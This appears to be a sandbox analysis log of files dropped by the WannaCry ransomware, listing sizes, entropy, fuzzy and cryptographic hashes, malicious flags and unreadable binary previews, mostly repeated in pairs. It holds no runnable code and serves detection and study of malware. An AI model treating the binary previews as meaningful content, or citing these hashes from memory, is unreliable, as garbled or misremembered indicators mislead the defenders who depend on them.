                                                                              SHA1:92BFBD060A8D0861AFCA2069181E176D695CF680
                                                                              SHA-256:20CE4447EA7A0EBA0DFEC8C0B209E55D0C8500ADE2BF96E75C7B571E744E9274
                                                                              SHA-512:CB89D39FF1926003E53028ACCF41D885AF3FD8D448BA2B094D3DDC1E2BA793A114371652A47CC702DACB7DE3528937AECE96E1B056AD1ADD83EB6B6DE4486D37
                                                                              Malicious:true
                                                                              Preview:WANACRY!........A.i.h .....{.....$...F6@...J.\...1H3]...rY\.....t ..f...y.u.c.kTaq....3@..A.{.|...%.VV&7.e.v..bq...#.v.T...i4"...>q...ig.E....T..._.EL.T..$.y.En8..q.RN.z..Pt..F......^....Z.E....R...Y_.28v..p.E.*L..e.\..?v.n...`.....k8.4B...$..`./a..q..I'....;........{....^h.:-.M.g~..`..'.7.....#1...7.s.&......,.2..i..........d....{:.......a(..a.....E..x.%..6.I..G....Q.2@..:....#2`..... U=...R..B.&.1...C.4..P...Vr...w..h.p..Z.e.`..K..K.br../.3...&I..q.y... ....@.\...>..{.d..5....N.o!bt/...Q.W.....d...7.,.R.....T....|..~<.a..9.|./.....K...g...Jj_seo..2[J.$....N..P..Wf.H{...q...O.u...c..$.P...!>-..<M".S.1....5...54...A...yN.!..vXi..&.a...$x.x..8.M:...s..o.F.....p...r..(..W.x.R..X..M..[..5..{q...B.\.x....@..k&.=......M.@=.(.<.._ .1...R{N.>.&..Rw..BRi8.s6])P.....x..AT..i8..H.-.Auk-.`.)..9..y....M*........sW.K......6.0..W.(7.=t..........>Db:.r.v.....Ogl...<y{..*.|.. R.o....n..Q.k"....m...wf.n...........8.z.gpvbT..?....\..9..^..VI...].
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1212760
                                                                              Entropy (8bit):7.999860400458235
                                                                              Encrypted:true
                                                                              SSDEEP:24576:4QXw8DwATjpDJ1OQeYaErGKSXZWtXjxJb97RM/+3TmnRcpwYR4N:JACwAftHQEjSJYXj/b9M+jSRcpwYQ
                                                                              MD5:2883D29628018808C0F4303AC8C3877B
                                                                              SHA1:92BFBD060A8D0861AFCA2069181E176D695CF680
                                                                              SHA-256:20CE4447EA7A0EBA0DFEC8C0B209E55D0C8500ADE2BF96E75C7B571E744E9274
                                                                              SHA-512:CB89D39FF1926003E53028ACCF41D885AF3FD8D448BA2B094D3DDC1E2BA793A114371652A47CC702DACB7DE3528937AECE96E1B056AD1ADD83EB6B6DE4486D37
                                                                              Malicious:true
                                                                              Preview:WANACRY!........A.i.h .....{.....$...F6@...J.\...1H3]...rY\.....t ..f...y.u.c.kTaq....3@..A.{.|...%.VV&7.e.v..bq...#.v.T...i4"...>q...ig.E....T..._.EL.T..$.y.En8..q.RN.z..Pt..F......^....Z.E....R...Y_.28v..p.E.*L..e.\..?v.n...`.....k8.4B...$..`./a..q..I'....;........{....^h.:-.M.g~..`..'.7.....#1...7.s.&......,.2..i..........d....{:.......a(..a.....E..x.%..6.I..G....Q.2@..:....#2`..... U=...R..B.&.1...C.4..P...Vr...w..h.p..Z.e.`..K..K.br../.3...&I..q.y... ....@.\...>..{.d..5....N.o!bt/...Q.W.....d...7.,.R.....T....|..~<.a..9.|./.....K...g...Jj_seo..2[J.$....N..P..Wf.H{...q...O.u...c..$.P...!>-..<M".S.1....5...54...A...yN.!..vXi..&.a...$x.x..8.M:...s..o.F.....p...r..(..W.x.R..X..M..[..5..{q...B.\.x....@..k&.=......M.@=.(.<.._ .1...R{N.>.&..Rw..BRi8.s6])P.....x..AT..i8..H.-.Auk-.`.)..9..y....M*........sW.K......6.0..W.(7.=t..........>Db:.r.v.....Ogl...<y{..*.|.. R.o....n..Q.k"....m...wf.n...........8.z.gpvbT..?....\..9..^..VI...].
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):18856
                                                                              Entropy (8bit):7.9884629493731865
                                                                              Encrypted:false
                                                                              SSDEEP:384:qi9lkHfmRQVpxcugSFAWwyyqIz0SAfykINVxOkmCHtY/VziCf3IdC:qsa+RnqFAGIz0TykoVlttYtJIA
                                                                              MD5:9B04C8AFA7FF70CB95474D1B106E8BCC
                                                                              SHA1:D2F9FB2B58F73C306EC7B476E58CAED36FAB673E
                                                                              SHA-256:C25B340A070A63B57BD4163F5291123B5BB948E75C30EF3FD730C3C63DB59FD0
                                                                              SHA-512:BC70AE7E65816CACD41A300DE5D4BBDE4E776204A74A3D9768213E77E169310C4A473842A000D6DEDD3822D7AABD8F312B8803254C9626E58B29C16FF807E058
                                                                              Malicious:false
                                                                              Preview:WANACRY!....d....w.[-0.v...Y.zT.......t.....|m..Z...`..M....m..g.....qk..*..3..60.9....V,.........b#.....K-G.>.P4.s=8C..FIL^.mc3....x.dOB$.R$.,..#).v..N0..4V .]....KD....d......7.....%.5.}...k....-7U...9....:.i..:...#.'.Z.#.....b..5...4......Pf.....bh.~R..+.....H......z....P...N..d).TD....U0.M.L#...>..5..._\...y...<V,,^&p?..52..]a....4..x\.M.@*.>K,.....W.0.S."&cDL.n....!.[<.........aQ..7.n.*v..P.#....Y.b..$G'.l9v..N...'.r..&.uRBt.p..".".qL.....bV~0....||.*...d.....v.Q~n...6no*....97.&.r..w..[MeE..@P..v...=^...$.E<........b.......0v^.O*-.FE..$...K".>..._..G...N...J....<.....:rJ^.._?.<.ZJ|n.....(...c=8C`Y..YB....n.....)..G.z.EM........[...}..6e.F....J.....X.j...G..Ij...5...|...r;...8.........^.kh.C.Y....Z......j.XRU.&...fZ.L..T..~..M2-...6.Z.SPU...e.tF..3....p.2..} *....,}$..(..ZJ.7..i.tOJ..x..[D.r.R|U`-...qd...M.2.d.xq.......R..$..U..I.."p"#._....5.Z.9.70..c:..9....Z..+.g.._.0.x7.c...~L.@....d.n....=..d.I~...r.....f9.Z&..H..~K..3..u.*...v.:.5.....q.,$.Fnb..K.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):18856
                                                                              Entropy (8bit):7.9884629493731865
                                                                              Encrypted:false
                                                                              SSDEEP:384:qi9lkHfmRQVpxcugSFAWwyyqIz0SAfykINVxOkmCHtY/VziCf3IdC:qsa+RnqFAGIz0TykoVlttYtJIA
                                                                              MD5:9B04C8AFA7FF70CB95474D1B106E8BCC
                                                                              SHA1:D2F9FB2B58F73C306EC7B476E58CAED36FAB673E
                                                                              SHA-256:C25B340A070A63B57BD4163F5291123B5BB948E75C30EF3FD730C3C63DB59FD0
                                                                              SHA-512:BC70AE7E65816CACD41A300DE5D4BBDE4E776204A74A3D9768213E77E169310C4A473842A000D6DEDD3822D7AABD8F312B8803254C9626E58B29C16FF807E058
                                                                              Malicious:false
                                                                              Preview:WANACRY!....d....w.[-0.v...Y.zT.......t.....|m..Z...`..M....m..g.....qk..*..3..60.9....V,.........b#.....K-G.>.P4.s=8C..FIL^.mc3....x.dOB$.R$.,..#).v..N0..4V .]....KD....d......7.....%.5.}...k....-7U...9....:.i..:...#.'.Z.#.....b..5...4......Pf.....bh.~R..+.....H......z....P...N..d).TD....U0.M.L#...>..5..._\...y...<V,,^&p?..52..]a....4..x\.M.@*.>K,.....W.0.S."&cDL.n....!.[<.........aQ..7.n.*v..P.#....Y.b..$G'.l9v..N...'.r..&.uRBt.p..".".qL.....bV~0....||.*...d.....v.Q~n...6no*....97.&.r..w..[MeE..@P..v...=^...$.E<........b.......0v^.O*-.FE..$...K".>..._..G...N...J....<.....:rJ^.._?.<.ZJ|n.....(...c=8C`Y..YB....n.....)..G.z.EM........[...}..6e.F....J.....X.j...G..Ij...5...|...r;...8.........^.kh.C.Y....Z......j.XRU.&...fZ.L..T..~..M2-...6.Z.SPU...e.tF..3....p.2..} *....,}$..(..ZJ.7..i.tOJ..x..[D.r.R|U`-...qd...M.2.d.xq.......R..$..U..I.."p"#._....5.Z.9.70..c:..9....Z..+.g.._.0.x7.c...~L.@....d.n....=..d.I~...r.....f9.Z&..H..~K..3..u.*...v.:.5.....q.,$.Fnb..K.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7304
                                                                              Entropy (8bit):7.975256681294146
                                                                              Encrypted:false
                                                                              SSDEEP:192:EEae/uvrEL+pBdhgvTe4x4WcFH/x1+otHgzWQvf3gKUL:fruv4L+pXyNO1pCf3O
                                                                              MD5:4C0F0ADC3848B05BFDA9178C03EFDC04
                                                                              SHA1:BB835C16FD8DE172395697F1616A053DA57A7467
                                                                              SHA-256:F38955B7C20C50AE87326368B03E4E1C39F5634193A100F03A20A26C12D51B3F
                                                                              SHA-512:256EEEFC06EBDF238A86855F90D678940C073BAC25925DC88402F22CBECB0320AEB0915DB2A003DCC24E857E56A7B9B9BA42C41890DFF9B24CAD381BA869AE81
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....kR....1K.x$;Z..d.(....;$_......U.yh...u....h..l4].]rAk....P...B...5.......YiY...S.......q..........@..........$@UK.%.......|.#I...9.l>....&fQb!.<P.....J.@)..`K2.....v.+5rr6tUqu...C..h.9.y.h..R....;F.S.p..Gk!NC.5..D.S....nD..17.@.[.a.0s..~..<.~V....o.......B;..(Kl..DanOl....4.eC..1(......p....&...A......f.bU..o(3W....A..\`d-..X.[...red.cU...$..b....O..OC............Y..a]..o.2....Z..Q........%t...........t.2o.P.....6s.}..&...D.,...#'.,`c.b....C...t....z....P@....8.\q.).uA.H../..Z.ZG...=$s.+......4........:.j..C..=R.s.........g"o.p....d.?.......~l.....H.S.. .. ..#...#8%..:......y......3.......Q.b....;=W_7..U..+.........m.1...9Z....."..o..x..ak)....7.l-..XC.M....j.C..... 8.>....:qH...f0..z.-.^..p`...,_l... .j.,..'....O..rqT...d._...[`.=....6..#8.G?8....Q..j/..a8.,.m..VqG....Gf..S.q4./......u...8.i....^..a......._...QJ....(w{..@.NA..h-(|lC..7..x.........~.G.......e...@..(.....%kp|.Y........Q".C...!UU'..........U..;......aH*w.....E
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7304
                                                                              Entropy (8bit):7.975256681294146
                                                                              Encrypted:false
                                                                              SSDEEP:192:EEae/uvrEL+pBdhgvTe4x4WcFH/x1+otHgzWQvf3gKUL:fruv4L+pXyNO1pCf3O
                                                                              MD5:4C0F0ADC3848B05BFDA9178C03EFDC04
                                                                              SHA1:BB835C16FD8DE172395697F1616A053DA57A7467
                                                                              SHA-256:F38955B7C20C50AE87326368B03E4E1C39F5634193A100F03A20A26C12D51B3F
                                                                              SHA-512:256EEEFC06EBDF238A86855F90D678940C073BAC25925DC88402F22CBECB0320AEB0915DB2A003DCC24E857E56A7B9B9BA42C41890DFF9B24CAD381BA869AE81
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....kR....1K.x$;Z..d.(....;$_......U.yh...u....h..l4].]rAk....P...B...5.......YiY...S.......q..........@..........$@UK.%.......|.#I...9.l>....&fQb!.<P.....J.@)..`K2.....v.+5rr6tUqu...C..h.9.y.h..R....;F.S.p..Gk!NC.5..D.S....nD..17.@.[.a.0s..~..<.~V....o.......B;..(Kl..DanOl....4.eC..1(......p....&...A......f.bU..o(3W....A..\`d-..X.[...red.cU...$..b....O..OC............Y..a]..o.2....Z..Q........%t...........t.2o.P.....6s.}..&...D.,...#'.,`c.b....C...t....z....P@....8.\q.).uA.H../..Z.ZG...=$s.+......4........:.j..C..=R.s.........g"o.p....d.?.......~l.....H.S.. .. ..#...#8%..:......y......3.......Q.b....;=W_7..U..+.........m.1...9Z....."..o..x..ak)....7.l-..XC.M....j.C..... 8.>....:qH...f0..z.-.^..p`...,_l... .j.,..'....O..rqT...d._...[`.=....6..#8.G?8....Q..j/..a8.,.m..VqG....Gf..S.q4./......u...8.i....^..a......._...QJ....(w{..@.NA..h-(|lC..7..x.........~.G.......e...@..(.....%kp|.Y........Q".C...!UU'..........U..;......aH*w.....E
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):11880
                                                                              Entropy (8bit):7.984013900964712
                                                                              Encrypted:false
                                                                              SSDEEP:192:+WkGpnjLxsQqqunm6pKhVFxn6tFqfEjI3Fo/jqrvLYVj+haPc7RPMhhmVbbzjOtW:1kuLxVqqYmMgV6y8jIC7qroCaPSPMAPd
                                                                              MD5:376D838738AE94DD8255450BD4C07261
                                                                              SHA1:4CA343A96A3CE2E439AB808DF79B9F7AAC997EEE
                                                                              SHA-256:D18A67E78420FF78FD06F3D4AEA6C4C5F54DA143C751F585DCE8CD17357620E5
                                                                              SHA-512:857BEA117EC6D2CDF269D5F3F41994E5F49DA76A984BBF00160EDF92078F599927E5B0433CF99CC86104F2DBB5EF2CA661CA316B9188DEDB33D2D9377EA64911
                                                                              Malicious:false
                                                                              Preview:WANACRY!....mJG.D.J..`...._?}..9Nt.n..}...3's.#.H.t..Gc0.eS..Q.C..y.......H..^n...R,j.dtZ.O...6.1.nh.H...Y...........................R.y.....'..........{.Q.-..|(....A~.Z.qS.|fm...[.O....B.....iS.d..W....?...l.0.....J!.l&."+m.1.q.H.P.d....}.4C.a.....8oe.....O-.......R...._..J.[.,.<x1..#.=.VF....].E(l9U... ._..=...\S.A3...<...C.?<._.F;.x.....j{..^d...e|p..0..._.2sn..ob...;....W.".8..$.L4..#S..>*s...........a........E...c\....^..~.........?W.u....?&.z.D.MeoH..=|OK...c..cS.d......dd. ..........jd...\.....u.........W...H.V..'....O&..L0..L.w.......Z6.ZW?x.X..v.......J.D...H........[j..].b..9.;.:zn....T...:.3B.i.............._.<.%=.9...MD...4.Z...G`tO....U.X2.W.@../.U>klPH~..4....Jj..b].\.E..N_E....<.@.X.@......].>@d...6e}..tB9|..n.=...l..mS@z.@b..R.j...!.,......%.2....K.R..."....'....}g ._.....n.%...K2..H.:..$3.%p..._..(.. ..._......8...c.w.p.m........=%8S..R..w...4j....G0..C...0|;8.V*.....b.."'.%f..A.Zs?.a.......^......Q}.CS...^Sp.(y..~a.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):11880
                                                                              Entropy (8bit):7.984013900964712
                                                                              Encrypted:false
                                                                              SSDEEP:192:+WkGpnjLxsQqqunm6pKhVFxn6tFqfEjI3Fo/jqrvLYVj+haPc7RPMhhmVbbzjOtW:1kuLxVqqYmMgV6y8jIC7qroCaPSPMAPd
                                                                              MD5:376D838738AE94DD8255450BD4C07261
                                                                              SHA1:4CA343A96A3CE2E439AB808DF79B9F7AAC997EEE
                                                                              SHA-256:D18A67E78420FF78FD06F3D4AEA6C4C5F54DA143C751F585DCE8CD17357620E5
                                                                              SHA-512:857BEA117EC6D2CDF269D5F3F41994E5F49DA76A984BBF00160EDF92078F599927E5B0433CF99CC86104F2DBB5EF2CA661CA316B9188DEDB33D2D9377EA64911
                                                                              Malicious:false
                                                                              Preview:WANACRY!....mJG.D.J..`...._?}..9Nt.n..}...3's.#.H.t..Gc0.eS..Q.C..y.......H..^n...R,j.dtZ.O...6.1.nh.H...Y...........................R.y.....'..........{.Q.-..|(....A~.Z.qS.|fm...[.O....B.....iS.d..W....?...l.0.....J!.l&."+m.1.q.H.P.d....}.4C.a.....8oe.....O-.......R...._..J.[.,.<x1..#.=.VF....].E(l9U... ._..=...\S.A3...<...C.?<._.F;.x.....j{..^d...e|p..0..._.2sn..ob...;....W.".8..$.L4..#S..>*s...........a........E...c\....^..~.........?W.u....?&.z.D.MeoH..=|OK...c..cS.d......dd. ..........jd...\.....u.........W...H.V..'....O&..L0..L.w.......Z6.ZW?x.X..v.......J.D...H........[j..].b..9.;.:zn....T...:.3B.i.............._.<.%=.9...MD...4.Z...G`tO....U.X2.W.@../.U>klPH~..4....Jj..b].\.E..N_E....<.@.X.@......].>@d...6e}..tB9|..n.=...l..mS@z.@b..R.j...!.,......%.2....K.R..."....'....}g ._.....n.%...K2..H.:..$3.%p..._..(.. ..._......8...c.w.p.m........=%8S..R..w...4j....G0..C...0|;8.V*.....b.."'.%f..A.Zs?.a.......^......Q}.CS...^Sp.(y..~a.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):97816
                                                                              Entropy (8bit):7.998083313470473
                                                                              Encrypted:true
                                                                              SSDEEP:1536:E/95ERUKlXcHHIv7LSeYqdeoLn7KiRuw+sr7OyEt5be84+UqMihQF4FKTxtp4mPR:EF5I5cHcYqd1D7TgsuyEbD4UMihxFKTX
                                                                              MD5:5887123700E4F44A714EBF5B02E59967
                                                                              SHA1:16079D7AAA705F2985B735569C32763754969852
                                                                              SHA-256:92C3A5F92412CED7C656EDBA29CD587762F539B292E96ADF08515C17962668F6
                                                                              SHA-512:AB35BEB8F42F1DDD8FB6CCDBA763DCAF6C714E4097D3A63BB142D252B7D0E50BDDEDBDF583DB27695C6BFA67E659C13A0235C5C1E8FBDD1B96A2252F0DD3AB91
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....k..:.'~..E L.}.X.. ....#.U..u.o{...}.:........Qff/.P.e...o....&.^.....>..}..1/WX...D^..uL.wl..O.......X..hz.bT..D........6..l.0.&.%.u.k'.......CA..+...-...62..i.Q=.....[W*.....W.e.N.@\d.c....k.yI.x.+@/C...]S!X..5-...5........4.g.DF...q...(P".......|.......g.i\65....^.<.y../Q3.c:.D..s..[..L..[.. ..J...2...q....M......I...BKA..a.....m[c......BI..S....v.>..f.....Qt.I...7.....".=...!....I.{.iBu...z.K.YX....?...x.y..,........._.y).b..B.d.B@.'........j!y..s!.*-gi.S.Q#].'0x..\%;*.].2.%.cQ...`.._,!...V....k....:/....AF.y~w...ET;n.a. wGZ......;9!..{+....8..y}G...&..6.rs...K]....:...n..D..J.........zf..K]&.....:d.....f#......6a.{.0...uW...F...]h..sy=K.]c....Vo...DK.+.@.&ePHe.,J....F.Am...>.......[Q.8,8KxK.vr...l./.R.p..d.;.d.......o..2M.v....1../Q..S..^...>%+..._)b...U.CA.>..=..y.d.$|...G7E@ou....Wv.....q.D...../S.V;gh.m.F.....d..G...V7....b..abtR..5.P...C...|h..0p...&*. 1R|.&uL...Tj.&W..y.&n...*....0.s...1...>.........m[.aS..... [.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):97816
                                                                              Entropy (8bit):7.998083313470473
                                                                              Encrypted:true
                                                                              SSDEEP:1536:E/95ERUKlXcHHIv7LSeYqdeoLn7KiRuw+sr7OyEt5be84+UqMihQF4FKTxtp4mPR:EF5I5cHcYqd1D7TgsuyEbD4UMihxFKTX
                                                                              MD5:5887123700E4F44A714EBF5B02E59967
                                                                              SHA1:16079D7AAA705F2985B735569C32763754969852
                                                                              SHA-256:92C3A5F92412CED7C656EDBA29CD587762F539B292E96ADF08515C17962668F6
                                                                              SHA-512:AB35BEB8F42F1DDD8FB6CCDBA763DCAF6C714E4097D3A63BB142D252B7D0E50BDDEDBDF583DB27695C6BFA67E659C13A0235C5C1E8FBDD1B96A2252F0DD3AB91
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....k..:.'~..E L.}.X.. ....#.U..u.o{...}.:........Qff/.P.e...o....&.^.....>..}..1/WX...D^..uL.wl..O.......X..hz.bT..D........6..l.0.&.%.u.k'.......CA..+...-...62..i.Q=.....[W*.....W.e.N.@\d.c....k.yI.x.+@/C...]S!X..5-...5........4.g.DF...q...(P".......|.......g.i\65....^.<.y../Q3.c:.D..s..[..L..[.. ..J...2...q....M......I...BKA..a.....m[c......BI..S....v.>..f.....Qt.I...7.....".=...!....I.{.iBu...z.K.YX....?...x.y..,........._.y).b..B.d.B@.'........j!y..s!.*-gi.S.Q#].'0x..\%;*.].2.%.cQ...`.._,!...V....k....:/....AF.y~w...ET;n.a. wGZ......;9!..{+....8..y}G...&..6.rs...K]....:...n..D..J.........zf..K]&.....:d.....f#......6a.{.0...uW...F...]h..sy=K.]c....Vo...DK.+.@.&ePHe.,J....F.Am...>.......[Q.8,8KxK.vr...l./.R.p..d.;.d.......o..2M.v....1../Q..S..^...>%+..._)b...U.CA.>..=..y.d.$|...G7E@ou....Wv.....q.D...../S.V;gh.m.F.....d..G...V7....b..abtR..5.P...C...|h..0p...&*. 1R|.&uL...Tj.&W..y.&n...*....0.s...1...>.........m[.aS..... [.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):46296
                                                                              Entropy (8bit):7.995668980588866
                                                                              Encrypted:true
                                                                              SSDEEP:768:TM5gXkTGmA4EdS4ZCrzfxxnFU615ZTCW1NUcYZDygDEiCQAhwS+yu4/sldOcoN6L:xkFATErz261LTJMcK/EISu4/slINjs
                                                                              MD5:EC9F34F7F9D588F3E0C16001F22E5422
                                                                              SHA1:D9E85F698F29984B5E7AE350D5BFDB1DF5E4A5BB
                                                                              SHA-256:9A0AE292C8F9476EA82B8F91CCC72C400AB4DF13E39DCD97B12B00B3A8692A4B
                                                                              SHA-512:8C4A0980EDEDEB4FC784D1D1EF935B7698A38EBD9058D5C25E5F3BAED1287E4B5E89F9A354BC7515E9DF1D34A272C1F501FC5BCAB36C0670F3E189809B2530BB
                                                                              Malicious:true
                                                                              Preview:WANACRY!....`.....-...c..uF.0......}....Z...^VS...U...Z~U .Be.....I...!.{.Z..R..P.a2S\....>.q..KY..A.[.g..._B..Nf..0K.;.s.....|..4RP6Qu.VI....^3.........v./.9...F....}...;' ...j3`=..#.ux\...C..P..L/g.;"...Y.;$sv......r.R....N.b...7.....k..z$?VK..`.n............>......dj..*...oP.D.....g..a.|,.....T.u.nS3...H....m..a...6G.......T.p.......M/.x.^....F... -..\.....Z.D...FY...o..2.*+.....m..H.U`!g`f....Y....M..5....meX)../.K.`.7.......>$..QS....J..w.(.H..........W.k.j..........^dS....e...........pQ...h.Q.......9........E2h........T......N...?.(J....\._@7.....K..ws..A&.J..'w....#@.CS...u.z`At..##....+......5.J.n-.m..#.S..b...A.....}....^..... .>....;..$....q\9....).M.l...M/.t..u..=a9"M..0......A...._U{q.T.._....P_....(.r.=L..]?].H.}dV.w..Yw.9.H.sbb........r.m..r.{CvF.8..$@..C0Jx.s".<.AF.| ;.t..../q..IZ~Y!.&.......Z.U....uD..`.I[.G.|.......99z...d...~({..L......,.L.!...........THh.....$'.r~.w ......N.0.6..q...Q...H....(...X..j..lM...%.....x*.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):46296
                                                                              Entropy (8bit):7.995668980588866
                                                                              Encrypted:true
                                                                              SSDEEP:768:TM5gXkTGmA4EdS4ZCrzfxxnFU615ZTCW1NUcYZDygDEiCQAhwS+yu4/sldOcoN6L:xkFATErz261LTJMcK/EISu4/slINjs
                                                                              MD5:EC9F34F7F9D588F3E0C16001F22E5422
                                                                              SHA1:D9E85F698F29984B5E7AE350D5BFDB1DF5E4A5BB
                                                                              SHA-256:9A0AE292C8F9476EA82B8F91CCC72C400AB4DF13E39DCD97B12B00B3A8692A4B
                                                                              SHA-512:8C4A0980EDEDEB4FC784D1D1EF935B7698A38EBD9058D5C25E5F3BAED1287E4B5E89F9A354BC7515E9DF1D34A272C1F501FC5BCAB36C0670F3E189809B2530BB
                                                                              Malicious:true
                                                                              Preview:WANACRY!....`.....-...c..uF.0......}....Z...^VS...U...Z~U .Be.....I...!.{.Z..R..P.a2S\....>.q..KY..A.[.g..._B..Nf..0K.;.s.....|..4RP6Qu.VI....^3.........v./.9...F....}...;' ...j3`=..#.ux\...C..P..L/g.;"...Y.;$sv......r.R....N.b...7.....k..z$?VK..`.n............>......dj..*...oP.D.....g..a.|,.....T.u.nS3...H....m..a...6G.......T.p.......M/.x.^....F... -..\.....Z.D...FY...o..2.*+.....m..H.U`!g`f....Y....M..5....meX)../.K.`.7.......>$..QS....J..w.(.H..........W.k.j..........^dS....e...........pQ...h.Q.......9........E2h........T......N...?.(J....\._@7.....K..ws..A&.J..'w....#@.CS...u.z`At..##....+......5.J.n-.m..#.S..b...A.....}....^..... .>....;..$....q\9....).M.l...M/.t..u..=a9"M..0......A...._U{q.T.._....P_....(.r.=L..]?].H.}dV.w..Yw.9.H.sbb........r.m..r.{CvF.8..$@..C0Jx.s".<.AF.| ;.t..../q..IZ~Y!.&.......Z.U....uD..`.I[.G.|.......99z...d...~({..L......,.L.!...........THh.....$'.r~.w ......N.0.6..q...Q...H....(...X..j..lM...%.....x*.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):36264
                                                                              Entropy (8bit):7.9953685305754005
                                                                              Encrypted:true
                                                                              SSDEEP:768:pdJQT+32ZM9a0IK7ct2cinwsxOXpj0IwG0NXLIet/lmprGSVs8q:1QT+DaLWcYXJLr/JSVsb
                                                                              MD5:FB0B44C5F4FFF49C8FB8D30DF9E1CB23
                                                                              SHA1:A8075D6BB5C0A5B4624BDF65DCC4F74F5E60D740
                                                                              SHA-256:918B832A58ACAC00DA92F40FD2D940CD377825C4BC74AF856A434A08B669473A
                                                                              SHA-512:AB312A61771A9CBA3EB2A624292FF59A22DFB9C8E2FB731EA38EECDF22EFC2C7FDAA4BA91ED02AD717A51F96AFEEB473ED6DCAF530EAD380FE79ACEEE65942E6
                                                                              Malicious:true
                                                                              Preview:WANACRY!....&...xTN...b.Ry.=?.$.wB.tv....e....N..z..V.:*."....v..c..j.r.|.....p|+....2......|..C..[.>.S..P4T...0Ll..u...y:A6..\r7$.....,.&%n.#d..2...*.m..../......gJ.).@@...AX.Mk.|..R.E.B..N.|s....>....{?6l1...-bJy...o.g`".n1=.%..E...|..B>....z....S'.!+k.qbM.............ccd.......jd.fD...7..W6.TzS...g.,..c'..f...?...28.U=...:"..3..L..noh.......T..o.].8...Q.W.\=...l .. .......m..yfT....cG.=.4.<P......3.L.....bg..w.=B..5b..%.n..NXx*....T.s.M.~..H".-.p..........<..V;^Y.Z.....8...J.ir.%.(&A.*4.....}<...'...\...]x....sXX{...[.>U..n..J....m^.A...\...1.Ky.t..!&...y.../.OS..d.@...a.t..L}... .Q..[......~..7%..P{P..Z.N\..J..,..P.v..S{..A.u(0z....I......T2..m...Wu.O..s.n*.^.....v<?)3tYn+..>m~}..2.&;.a8@5C.!."r...e.w.Z...E..W..YdE[.c.9S'..?.....+m.....6.*Jt.Bs..h7..I/.c...>....@....n..:.......z.wk....E .N<...,.1S..K..I..JqS...JsY.>.#......xPk...b.$...@:.H....4.PE./2..8.y..?H_z..pw.j..?g+@......h?......S.\u`...j.....+..2..>MR.=..y...i:......q....u.'...`OI
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):36264
                                                                              Entropy (8bit):7.9953685305754005
                                                                              Encrypted:true
                                                                              SSDEEP:768:pdJQT+32ZM9a0IK7ct2cinwsxOXpj0IwG0NXLIet/lmprGSVs8q:1QT+DaLWcYXJLr/JSVsb
                                                                              MD5:FB0B44C5F4FFF49C8FB8D30DF9E1CB23
                                                                              SHA1:A8075D6BB5C0A5B4624BDF65DCC4F74F5E60D740
                                                                              SHA-256:918B832A58ACAC00DA92F40FD2D940CD377825C4BC74AF856A434A08B669473A
                                                                              SHA-512:AB312A61771A9CBA3EB2A624292FF59A22DFB9C8E2FB731EA38EECDF22EFC2C7FDAA4BA91ED02AD717A51F96AFEEB473ED6DCAF530EAD380FE79ACEEE65942E6
                                                                              Malicious:true
                                                                              Preview:WANACRY!....&...xTN...b.Ry.=?.$.wB.tv....e....N..z..V.:*."....v..c..j.r.|.....p|+....2......|..C..[.>.S..P4T...0Ll..u...y:A6..\r7$.....,.&%n.#d..2...*.m..../......gJ.).@@...AX.Mk.|..R.E.B..N.|s....>....{?6l1...-bJy...o.g`".n1=.%..E...|..B>....z....S'.!+k.qbM.............ccd.......jd.fD...7..W6.TzS...g.,..c'..f...?...28.U=...:"..3..L..noh.......T..o.].8...Q.W.\=...l .. .......m..yfT....cG.=.4.<P......3.L.....bg..w.=B..5b..%.n..NXx*....T.s.M.~..H".-.p..........<..V;^Y.Z.....8...J.ir.%.(&A.*4.....}<...'...\...]x....sXX{...[.>U..n..J....m^.A...\...1.Ky.t..!&...y.../.OS..d.@...a.t..L}... .Q..[......~..7%..P{P..Z.N\..J..,..P.v..S{..A.u(0z....I......T2..m...Wu.O..s.n*.^.....v<?)3tYn+..>m~}..2.&;.a8@5C.!."r...e.w.Z...E..W..YdE[.c.9S'..?.....+m.....6.*Jt.Bs..h7..I/.c...>....@....n..:.......z.wk....E .N<...,.1S..K..I..JqS...JsY.>.#......xPk...b.$...@:.H....4.PE./2..8.y..?H_z..pw.j..?g+@......h?......S.\u`...j.....+..2..>MR.=..y...i:......q....u.'...`OI
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):702504
                                                                              Entropy (8bit):7.999730745166842
                                                                              Encrypted:true
                                                                              SSDEEP:12288:DosN1q12Z4aDs2Kgqbz8Sq2PbsdNMaw3deq8eW2ciTK1G0iEVCNcgG+QsA8jKI22:zRwUqpEiaAddc9gGhsA8jA/gj
                                                                              MD5:3AC866E9904AD8161A19FADB62DA3549
                                                                              SHA1:D6FCBF2B37B6EE36FB102387E67CAD111E21A557
                                                                              SHA-256:1CB3FBD2587A9C86C467E0A78CAE93B837C612E72D922D3D5A9323030CD58622
